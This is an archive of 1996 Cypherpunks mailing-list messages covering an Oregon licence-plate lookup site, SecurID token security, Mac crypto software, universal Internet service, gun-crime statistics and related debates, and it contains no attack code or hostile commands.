Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <ae2ed55000021004bcce@[205.199.118.202]>
Message-ID: <Pine.SUN.3.92.960808002142.18399B-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 7 Aug 1996, Timothy C. May wrote:

> Cypherpunks make the news again.
>
> I'm watching the LA NBC news channel, and they report that the Oregon "look
> up any license plate" Web site is causing a flap. Though apparently legal,
> the critics admit, the Governor wants the material removed.

It also hit the front page of the Oregonian (Portland's most stogy
newspaper).  They had a quote from the person who put up the page claiming
his reasons behind it was "that he did not like all those anonymous drivers
out there able to act however they wanted".

It will be interesting to see the state come out on the side of all those
anonymous drivers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 8 Aug 1996 15:09:54 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Mena
In-Reply-To: <199608071506.PAA13182@pipe1.t1.usa.pipeline.com>
Message-ID: <Pine.SOL.3.91.960808002459.23122A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Wall Street Journal, 5/3/94:

"Our sources agree ... on a number of things:  
There was most likely a CIA-sponsored Contra operation run out of Mena, 
as well as a huge parallel cocaine-smuggling operation, money laundering 
and a Justice Department coverup.  Much of this happened on Mr. Clinton's 
watch as governor."

[...]

"Mr. Clinton was asked by a state prosecutor for help to pursue the case ...
Help was promised but never arrived."

[...]

"Mena is a perplexing and difficult story.  There is a trail - tens of 
millions of dollars in cocaine profits, and we don't know where it 
leads.  It is a trail that has been blocked by the National Security 
Council."

- letter from Bill Plante, CBS News Correspondent and
              Michael Singer, Producer, CBS News



On Wed, 7 Aug 1996, John Young wrote:

>    The Washington Post, August 7, 1996, p. A6. 
>  
>  
>    CIA Probed in Alleged Arms Shipments 
>  
>       Reports Claim Agents Involved in Arkansas-Nicaragua Drug 
>       Swaps 
[...]
>  
>    Clinton has said he had nothing to do with any activities 
>    at Mena. "Mena is the darkest backwater of the right wing 
>    conspiracy industry," said White House spokesman Mark 
>    Fabiani. "The allegations are as bizarre as they are 
>    false." 
>  
>    [End] 
>  
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 8 Aug 1996 14:35:57 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: [STEGO] Your_Name in This Space
Message-ID: <v03007802ae2ebaf0056b@[194.24.161.216]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

fellow 'punks,

An artist named Zoltán Szegedy-Maszák is doing some interesting work for an
organiztion named "C3" (the "3" is a superscript and it's pronounced
"see-cubed") in Budapest, Hungary. C3 is an arts/culture/net.communication
organization funded by the Soros Foundation, SGI and Matav (the Hungarian
telephone company). They have a nice little Silicon Lab with an Onyx and a
few Indy's, PC and Macs, and Zoltan has a page up on one of the Indy that
demonstrates his "Cryptogram" generator:

   <http://lucida.c3.hu/cryptogram/>

This project takes ASCII text strings and converts them into 3D models by
assigning vertex coordinate values based on the ASCII codes encrypted by
what I'll call a "key model." Essentially, it's a simple 3D steganography
engine. It's rather intriguiging from a cryptographic perspective (pun
intended). Zoltan sees it as a way of transferring .wrl fies among VRML
afficionados, but also as a way of embedding messages. Definitely worth a
peek: try your own name in VRML, light sources and all. :)

Also check out C3's main site at: <http://www.c3.hu/>.

   dave

___________________________________________________________________
Cryptography is the entertainment branch of the computing industry.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv
Comment: Verbum sapienti satis est.

iQCVAwUBMgkRo6HBOF9KrwDlAQEjygP9GnnyGNPO8pIjgEnQaU//VIUh/DUANB1L
67XcAZ2dzTZ4/fGrDrTjaj/9AGH2Hx7R6szqDX5CLhP1fP+wUevBkKKvAqVoP8vU
kRWb55iX3vsHN43jS0e4npKhil+HsXD8m7+tIFXIrPBRGcE+V1nbPaQpTG7LkBbO
tFWREzxX+U8=
=P7oA
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 8 Aug 1996 15:35:20 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
In-Reply-To: <v03007803ae2e770bd71e@[204.179.128.38]>
Message-ID: <sBsBsD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Vinnie Moscaritolo <vinnie@webstuff.apple.com> writes:
> 2) Apple is nowhere near dead, anyone who says this is either smoking
> something harsh or lives in media painted world. The same people that say
> Macs are dead are the same uneducated liberal buttheads who write in the
> San Jose Merc Pravda about how a disarmed populus is a free(h)er one.

Apple computer is dead, for all intents and purposes. It will be "officially"
dead (bankrupt) within a couple of years. Writing any sort of software for the
Mac - crypto or otherwise - is a waste of time.

> so lets all grow a little thicker skin and move on with it. while you all
> piss and moan, your rights are being stolen away, If you want to help
> crypto suceed then you have to care about Macs, just as much as windoze or
> Sun or Be or whatever platform.

Please don't waste valuable resources writing software for a dead platform.
Mac crypto software is as useless as CP/M or Apple ][ crypto software.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 8 Aug 1996 16:11:20 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <Pine.SV4.3.91.960807181525.13468G-100000@larry.infi.net>
Message-ID: <1XsBsD52w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:

> You can act through a corportion; if you are using it as a true "alter
> ego", it will be put aside by the courts and you will be assessed back
> taxes, interest, and penalties. The employer will also.
>
> If the person who pays you, has the _right_ (exercised or not) to tell
> you how to do the work.... you are his employee. This is a summary, but a
> good one.

Alan, if you have access to Usenet, check out the draft misc.jobs.*
conventional wisdom FAQ that I posted a few days ago... It's probably
unexpired in sci.research.careers at most sites. Look for the 'IRS 20
questions'.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Thu, 8 Aug 1996 18:44:08 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
In-Reply-To: <v03007803ae2e770bd71e@[204.179.128.38]>
Message-ID: <3209A1D4.7566@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM wrote:
> 
> Apple computer is dead, for all intents and purposes. It will be "officially"
> dead (bankrupt) within a couple of years. Writing any sort of software for the
> Mac - crypto or otherwise - is a waste of time.

If you accept that, then doesn't that make writing crypto software for
any Unix platform *even more* of a waste of time?  Because last time I
checked, there were way more Macs on mom-and-pop's desks than Unix
machines, counting *all* vendors.

Even if Apple folded *tomorrow*, those machines wouldn't vaporize.
If you put easy-to-use strong crypto on a significant fraction of
those desks six months from now, your work could easily have a lifetime
of a year and a half even in your worst case scenario.

(PS, I haven't used a Mac since 1985, so that's not why I say this.)


-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Thu, 8 Aug 1996 09:36:08 +0800
To: cypherpunks@toad.com
Subject: Re: F2 hash?
In-Reply-To: <199608072029.NAA29976@jobe.shell.portal.com>
Message-ID: <Pine.GSO.3.93.960808011718.28847G-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 7 Aug 1996 anonymous-remailer@shell.portal.com wrote:

> F2 is a secret hash from SecurityDynamics, and is used in
> their client software.  (Its not the hash in the cards, but
> if anyone has a copy of that, it might be fun.)

As I have to deal with SecurID tokens in the nearest future, I would like
to hear more opinions about these cards. IMHO a proprietary algorithm like
used in those cards is a bad thing and I would like an open approach much
more, I still believe SecurID OTP cards are much better then usual
passwords.

At Defcon this year they promised to tell about some security flaws in
SecurID tokens, anyone know more about that?

Personally I believe that Security Dynamics should come out with some kind
of new systems in the nearest future, now that they own RSA. 

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 9 Aug 1996 01:02:33 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Babble about universal service
In-Reply-To: <01I807LCWIHW9JD2RG@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.960808053450.29528B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I also wonder why universal service is such a Good Thing. It also, 
unfortunately, is on the agendas for the G-7-type meetings of information 
ministers from participating countries. http://www.eff.org/~declan/global/

(My objections to universal service are perhaps not surprising. It
devolves more power into the hands of the DC bureaucrats such as the FCC,
and provides a slippery slope on which we can slide down towards more and
more government regulation. By concentrating regulatory authority in the
Federal government, it also makes decisions more subsceptible to
special-interest lobbying and political patronage. But I recall Ronda has
been arguing for universal service for some time now, including on the
netizens mailing list.)

-Declan



On Wed, 7 Aug 1996, E. ALLEN SMITH wrote:

> 	I wish that people (like Phil Agre, who claims to be in favor of
> democracy on the Net) might get it through their heads that many - probably
> most - of those already on the Net have no desire to see every redneck on the
> planet on here, much less pay for the privilege of their being able to send
> inane messages to us.
> 	-Allen
> 
> From:	IN%"rre@weber.ucsd.edu" 17-JUL-1996 23:08:46.62
> From: Phil Agre <pagre@weber.ucsd.edu>
> 
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> This message was forwarded through the Red Rock Eater News Service (RRE).
> Send any replies to the original author, listed in the From: field below.
> You are welcome to send the message along to others but please do not use
> the "redirect" command.  For information on RRE, including instructions
> for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> 
> Date: 2 Jul 1996 17:03:29 GMT
> From: rh120@columbia.edu (Ronda Hauben)
> Organization: Columbia University
> 
> 
> Report 1
> 
> I just returned from a fascinating week in Montreal, Canada where I
> attended the INET '96 conference held by the Internet Society. I will
> try to write some reports about what happened at the Conference in the
> next week or two as it would be good to have the online community
> discuss some of the issues that were raised at the Conference.
> 
> What became clear at the conference was that this is an important 
> time in the development of the Internet. People from around the 
> world attended the conference and most expressed the desire that
> the Internet be made available in their countries for education
> and scientific and other uses. Some of the focus of the conference
> was on business uses of the Internet, but it seemed that there was
> a great concern among the people I spoke to that the Internet be
> available for educational and scientific and government and 
> community purposes, not just for business uses.
> 
> I want to start this report however, with the last talk that was
> given at the conference. The final talk was to be given by Reed Hunt
> of the U.S. Federal Communications Commission. He didn't attend
> however, and instead the talk was given by Blair Levin, Chief of 
> Staff at the FCC instea.
> 
> A version of the talk is available at the FCC www site. 
> 
> The talk was a surprise as it seemed uninformed both about the 
> history and importance of the Internet and of the important public
> policy considerations that need to be taken into account when making
> any rules for regulating the Internet. 
> 
> At the beginning of the talk, there was the statement that Reed Hunt
> was the first FCC Chairman to have a computer on his desk, but that 
> he asked his staff to explain how the Internet works. So instead
> of a commitment to learn about how the Internet developed and the 
> significant impact it is having on the world, the speech presented
> us with the glib "the Internet gives us the opportunity to change
> all our communications policies."
> 
> The problem with this is that the FCC is therefore starting from
> scratch, throwing out all the lessons that have helped the Internet
> to grow and develop, and instead, creating its own models.
> 
> In his talk Blair Levin listed five principles. They were:
> 
> 1) How can public policy promote expansion of band width?
> 2) What rules can we get rid of or have?
> 3) The concern with pricing.
> 4) How to make sure it reaches everyone, especially kids in schools.
> 5) How to make sure it reaches across the globe.
> 
> The problem with this was that it took universal service as the 4th
> point, and then basically substituted access by kids in schools for
> the principle of universal service.
> 
> During the talk Blair described how the NTIA (the National
> Telecommunications Information Administration) had submitted an
> important paper to the FCC on the issue of voice over the Internet.
> 
> This made clear that the NTIA has not submitted any paper to the FCC
> on the issue of universal service, despite the fact that they held an
> online hearing on several issues, including universal service and the
> Internet, in November 1994 and the NTIA has done nothing to act on the
> broad expression of sentiment for universal service that was expressed
> during that online public meeting.
> 
> When asked about that online meeting, Blair said that the FCC knew of
> the meeting. However, it seems to have had no effect on their
> deliberations, or on the request of people that the FCC open up their
> decision making process so that the people who are being affected by
> their decisions have a means of providing input into those decisions.
> 
> In response to a question about the need for universal service Blair
> responded that that was the obligation of other branches of the
> U.S. government like the Department of Education.
> 
> He said this despite the fact that at the current moment the FCC is
> supposedly making rules to provide for the universal service
> provisions of the Telecommunications Act passed by the U.S. Congress
> in Feb. 1996.
> 
> Also, he claimed to welcome submissions into their process, but when
> told that it would cost over $50 to pay postage costs for a submission
> since there were over 35 people who had to be served (and postage on a
> minimal submission was $1.45), he said to see Kevin Werbach a lawyer
> at the FCC, who had come with him. Kevin Werbach offered no means of
> dealing with the high cost of making a submission.
> 
> Many people at the Internet Society Conference applauded in response
> to the question about the lack of concern by the FCC for the principle
> of universal service to the Internet. At the Internet Society
> conference many people spoke up about the need in their countries,
> whether that be Canada, or Norway, or Ghana, etc. for the Net to be
> more widespread and available to the public for educational and
> community purposes. Many were concerned about the lack of ability of
> the so called "market forces" to provide networking access to other
> than corporate or well to do users. Yet here was a talk being given in
> the name of the Chairman of the regulatory body in the U.S. charged
> with making the rules to provide for universal service, and the talk
> was unconcerned with the important issues and problems that issue of
> providing universal service to the Internet raises.
> 
> It is unfortunate that Reed Hunt didn't come to the conference and
> take the challenge to learn what the real concerns of people around
> the world are with regard to access to the Internet. Isolated in
> Washington, with no access to him possible for most people (though
> someone from one company told me that he was told to send him email
> whenever he had a concern), it seems difficult for the rules process
> to be able to produce any helpful outcome. There need to be open
> meetings and sessions where people who are concerned with these issues
> are invited to be heard and to discuss these issues with the
> FCC. Instead the process is going on behind the same closed doors that
> the crafting of the Telecommunications Act was created by the
> U.S. Congress.
> 
> It is a tribute to the Internet Society that they did make an effort
> to invite government officials like Reed Hunt to the conference.
> 
> The FCC will be setting an example for the rest of the world by the
> telecommunications policy rules it creates. Will the policy be one
> that recognizes that the so called "market" cannot provide the free or
> low cost access to the Internet that is necessary to make such
> universal service a reality? Will the rules created be based on
> looking back at how time sharing and the the ARPANET and the Internet
> developed so it can build on those lessons?  To have those rules be
> based on firm lessons from the past and firm principles that can make
> them fruitful, it is necessary that the FCC process creating those
> rules be much more open than it is at present. If the FCC could learn
> from the experience of the Internet and set up newsgroups and real
> email access to the officials involved that would demonstrate a
> commitment to a more equitable access to the Internet and to the fcc
> rulemaking that is needed to make the Internet available to all. But
> from the recent talk by the FCC official presented at INET '96, there
> seems little indication that the need for an open process and a many
> to many means of communication is recognized among those at the FCC
> and thus there is even less evidence that the FCC is capable of making
> rules to apply the principle of universal service to make Internet
> access available to all.
>  ----------------------------------------------------------------------
> Michael Hauben 			Teachers College Dept. of Communication
> Amateur Computerist Newsletter  http://www.columbia.edu/~hauben/acn/
> WWW Music Index			http://www.columbia.edu/~hauben/music/
> Netizens Netbook                http://www.columbia.edu/~hauben/netbook/
>  Netizens Cyberstop
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 9 Aug 1996 00:01:51 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Oregon License Plate Site in the News Tonight!
In-Reply-To: <ae2ed55000021004bcce@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960808055257.29528C-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Looks like we're a little late. However, we can still grab the tape from 
Oregon's DMV for $220. It would be an interesting excercise to try to get 
these tapes from each state with similar provisions and put them all 
online.

Anyone want to donate server space?

-Declan


http://www.spiritone.com/cgi-bin/plates

   Service has been temporarily suspended.
   Don't panic, I just want to think about the situation for a while.    
   Stay tuned. --Aaron

---

   There is a very real chance that it will be turned off. That's becuase
   all of the people who hate it call the TV and Radio stations, the DMV,
   and their elected representitives. All of the people who love it send
   me email. As much as I appreciate hearing from all of you, sending me
   email doesn't let anyone else know how you feel. If you want to keep
   this service going, make your voices heard.



On Wed, 7 Aug 1996, Timothy C. May wrote:

> 
> Cypherpunks make the news again.
> 
> I'm watching the LA NBC news channel, and they report that the Oregon "look
> up any license plate" Web site is causing a flap. Though apparently legal,
> the critics admit, the Governor wants the material removed.
> 
> (Sounds like a good time to mirror it on some other sites, pronto!)
> 
> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 8 Aug 1996 23:48:00 +0800
To: jk@stallion.ee (Jüri Kaljundi)
Subject: Re: F2 hash?
In-Reply-To: <Pine.GSO.3.93.960808112837.12351D-100000@nebula.online.ee>
Message-ID: <199608081150.GAA18566@homeport.org>
MIME-Version: 1.0
Content-Type: text


This doesn't work as of version 1.3(?) and later.  There is a time
delay before the 'ok' message is sent by the server.  If it gets two
correct login attempts in the delay period (1-5 seconds, default 2),
it assumes an attack is underway and rejects them both.

Adam


=?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote:
|  Wed, 7 Aug 1996, Adam Shostack wrote:
| > J=FCri Kaljundi wrote:

| > | At Defcon this year they promised to tell about some security flaws in
| > | SecurID tokens, anyone know more about that?

| > =09My understanding is that the guy who was going to give the
| > talk had nda difficulties.  Vin?  Did you make it out?  The talk was
| > going to be on race conditions, denial of service attacks, and the
| > like.
| 
| This is something that seems to be a little problematic to me. Considering
| the 3-minute time slot, it seems fairly easy to somehow block the SecurID
| server at the time a user is sending his username/passcode, steal that
| information and allow a malicious user to enter that information into the
| server. Or have I misunderstood some security aspects?
| 
| J=FCri Kaljundi
| AS Stallion
| jk@stallion.ee



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 8 Aug 1996 17:52:00 +0800
To: "Mark C. Henderson" <mch@squirrel.com>
Subject: Re: Internal Passports
In-Reply-To: <9608071707.TE12105@squirrel.com>
Message-ID: <Pine.LNX.3.94.960808070101.346A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 7 Aug 1996, Mark C. Henderson wrote:
> 
> I note that California requires some sort of documentation (birth 
> cert, INS documentation etc.) for a new driver's licence. Don't know
> about other states.  
> 

Hrmm... North Carolina requires 2 forms of ID, which can be an older
Driver's license, a SS card, a military ID, a birth certificate, or
(you'll love this one)...   "A filled in job application"... It doesn't
even have to be signed by the company, or any of that shit.  I can walk
over to RatShack, ask for an application, fill it out as "J. E. Hoover",
and its a valid form of ID at the DMV.

> probably related story:
> This might explain why in 1994 when I was travelling back home to 
> Vancouver B.C. from Europe via the states (cheap ticket), the U.S. 
> immigration officer asked me "Do you have a social security number?". 
> I said yes. She then asked "do you have your social security card 
> with you?" I didn't have it, and said so. She asked to see my ticket 
> on to Vancouver, and that was it. I thought it was weird at the time 
> as I'm used to various questions, and hearing one that I didn't 
> expect at least made the experience mildly interesting. 
> 

Hrmm.. that is a bit odd, isn't it?

 --Deviant
THE MAGIC WORDS ARE SQUEAMISH OSSIFRAGE


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgmRsDAJap8fyDMVAQEZiAf/UFv/5SyUbKbz/L9/kz/qRKfp5ba/31wE
O29E7NTV7uDayVjr8ofiZ70PRk7HWM1hqnalHGywO+W4eM3g5GfBa/m13Pqg0Lhm
9SOGMPiZSjALyhBfGkxOm8pMt7ex9X6VyQaS+ogyRyjLXfR0XzngIe21SOrfntn0
JWCk/SzsZ8G0ouP/u1CzbXcgE2YVoXR2diK6o9rE0NKVFmr3lyC2HrP2ECoqXVaG
y+IZrpD0Zz5p6Bp4nMT0Pn+8+u9fH/Sse5VtbHqTmDKDIZm7NtQiHG6cZUcyYCyR
5oLT1vPCSYT1dax3/Ym8jUnNmLDk87ZoWJ15EQOFJopHEsjKRsb8ww==
=aDJy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 8 Aug 1996 17:48:56 +0800
To: JonWienk@ix.netcom.com
Subject: Re: STEGO GUNS
In-Reply-To: <199608080121.SAA20077@dfw-ix9.ix.netcom.com>
Message-ID: <Pine.SUN.3.95.960808070140.18519C-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 7 Aug 1996 JonWienk@ix.netcom.com wrote:

> In 1981, the city of Kennesaw, GA suffered 17 violent crimes and 55 
> burglaries. 
> In 1982, Kennesaw passed an ordinance requiring all city residents to own a 

	Said ordinance being passed, as a protest against Elk Grove, IL
	passing an orinance, banning handguns.  Anybody know when Elk
	Grove revoked their ordinance?  Crime went down for six months
	there [ Elk Grove ] after the ban was passed, then it went up
	--- far surpassing previous crime levels, for all types of
	crime. 

        xan

        jonathon
        grafolog@netcom.com



	Illiterate: adj.  Inability to read write or speak five 
	or fewer languages.
	Funksioneel Ongeleerd:  a.  Die wat kon nee elf or meer tale 
	lees, skryf and gesprek. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 8 Aug 1996 22:07:33 +0800
To: cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
In-Reply-To: <3209A1D4.7566@netscape.com>
Message-ID: <N90BsD55w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jamie Zawinski <jwz@netscape.com> writes:
> Dr.Dimitri Vulis KOTM wrote:
> >
> > Apple computer is dead, for all intents and purposes. It will be "officiall
> > dead (bankrupt) within a couple of years. Writing any sort of software for
> > Mac - crypto or otherwise - is a waste of time.
>
> If you accept that, then doesn't that make writing crypto software for
> any Unix platform *even more* of a waste of time?  Because last time I
> checked, there were way more Macs on mom-and-pop's desks than Unix
> machines, counting *all* vendors.

Irrelevant. Unix boxes are multi-user.

> Even if Apple folded *tomorrow*, those machines wouldn't vaporize.
> If you put easy-to-use strong crypto on a significant fraction of
> those desks six months from now, your work could easily have a lifetime
> of a year and a half even in your worst case scenario.

Scenario 1: writing a multi-platform comm program with strong crypto, and
including a Mac port (like Mac PGP, or clients for various tcp/ip protocols)
is only a minor waste of time.

Scenario 2: writing an encrypted filesystem for the Mac is a minor waste.

Scenario 3: Writing a comm program that lets Macs talk to each other with
no consideration that some Mac users may wish to talk to other platform
(or any other Mac-only software) is a major waste of time.

Of course, Apple is pushing #3. They're worse than Microsoft.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 9 Aug 1996 05:32:53 +0800
To: cypherpunks@toad.com
Subject: Re: F2 hash?
Message-ID: <2.2.32.19960808142120.006c075c@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:27 AM 8/8/96 +0300, you wrote:

>As I have to deal with SecurID tokens in the nearest future, I would like
>to hear more opinions about these cards. IMHO a proprietary algorithm like
>used in those cards is a bad thing and I would like an open approach much
>more, I still believe SecurID OTP cards are much better then usual
>passwords.
>
>At Defcon this year they promised to tell about some security flaws in
>SecurID tokens, anyone know more about that?
>
>Personally I believe that Security Dynamics should come out with some kind
>of new systems in the nearest future, now that they own RSA. 

Have you seen Mudge's white paper on S/Key?  It isn't specifically regarding
SecurID, but many of the flaws he discusses are fundamental to the nature of
both S/Key and SecurID (and other OTP schemes), so apply to SecurID as
well...   
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 8 Aug 1996 18:07:38 +0800
To: Roger Williams <roger@coelacanth.com>
Subject: Re: Wee Beasties on Mars [NOISE]
In-Reply-To: <rogerafw6ockb.fsf@sturgeon.coelacanth.com>
Message-ID: <Pine.LNX.3.94.960808071954.346B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 7 Aug 1996, Roger Williams wrote:
> 
> I doubt if it weakens the Creationists' stand, though.  After all, if
> God created life on Earth, she could have created it anywhere else she
> wanted, without having to ask permission of the inhabitants of the
> "third rock from the sun".  [As you're no doubt aware, this has been,
> in part, the premise of several moderately-successful SF novels.]
> 

But, on the other hand, it _could_ be used to strengthen the Evolution
argument (which has been scientificly proven, so its not really an
argument).  If carbon can randomly be arranged here, why not on Mars?
Same process, different rock.

Personally, I can't see why some people refuse to accept that the to
"theories" could very easily fit together... i.e. "God" made the world,
and let the puzzle solve itself. (of course, this is assuming there is a
"God", but...

 --Deviant
        "Evil does seek to maintain power by suppressing the truth."
        "Or by misleading the innocent."
                -- Spock and McCoy, "And The Children Shall Lead",
                   stardate 5029.5.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgmV+DAJap8fyDMVAQF8Hwf+IbwmZaTXqogQAyGEgr0CjbeAfdl7HZBW
0XMKizZeMEu6IRW1Gh18hQLJYL7DuiJg//ymTAkIJFjPByiwhOe26pkgMAdtw632
wwWuWMI9h+X20U9vKvxtvjjKz2PScWJqiOC1kZex+V2qXdYuW2EF7oE+VYwl57dY
cCtk10yUaHuwYMk6jZMMTY5KeF13u+NX2zLrpKRAa//gXNcaNtzOfHJhSaTzoR1D
/cnej5j6E5pLRKolgyGLc0jZAyGMWS8t+QYWcVg6PHA1au12rmwdc2po7WoQnNyQ
DbD+6PZrKAKOTnwiU4ytqgMQFnfRcVaxzB48MPn+TipaCPKl990hQg==
=2h24
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 8 Aug 1996 09:28:28 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: STEGO GUNS
In-Reply-To: <Pine.SUN.3.91.960807101421.20235A-100000@crl14.crl.com>
Message-ID: <199608072128.HAA28140@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> C'punks,
> 
> The following is from USA Today of last Friday:
> 
> 	In a comprehensive study that may reshape the 
> 	gun control debate, researchers have found that 
> 	letting people carry concealed guns appears to
> 	sharply reduce killings, rapes and other violent
> 	crimes.
> 
> 	The nationwide study [from the University of
> 	Chicago] found that violent crime fell after
> 	states made it legal to carry concealed handguns:
> 	*   Homicide, down 8.5%.
> 	*   Rape, down 5%.
> 	*   Aggravated assault, down 7%.
> 	...
> 	The drop isn't primarily caused by people 
> 	defending themselves with guns, says John Lott,
> 	the study's author.  Rather, criminals seem to 
> 	alter their behavior to avoid coming into contact
> 	with a person who might have a gun.
> 
> The official release of the study is scheduled for tomorrow.  
> The study took two years and was peer reviewed.
> 
> 
>  S a n d y

Correlation != causation. What are the figures on other crimes? I
presume they would have to have gone up, since the criminal element has
been deprived of it's "revenue" in this manner. Perhaps they simply
didn't have time for killing, raping and assulting; being too busy
lugging around their legally concealed handguns and pointing them at
shop-keepers.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Fri, 9 Aug 1996 02:21:34 +0800
To: cypherpunks@toad.com
Subject: Re: F2 hash?
Message-ID: <2.2.32.19960808143045.006ce858@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>| At Defcon this year they promised to tell about some security flaws in
>| SecurID tokens, anyone know more about that?
>
>	My understanding is that the guy who was going to give the
>talk had nda difficulties.  Vin?  Did you make it out?  The talk was
>going to be on race conditions, denial of service attacks, and the
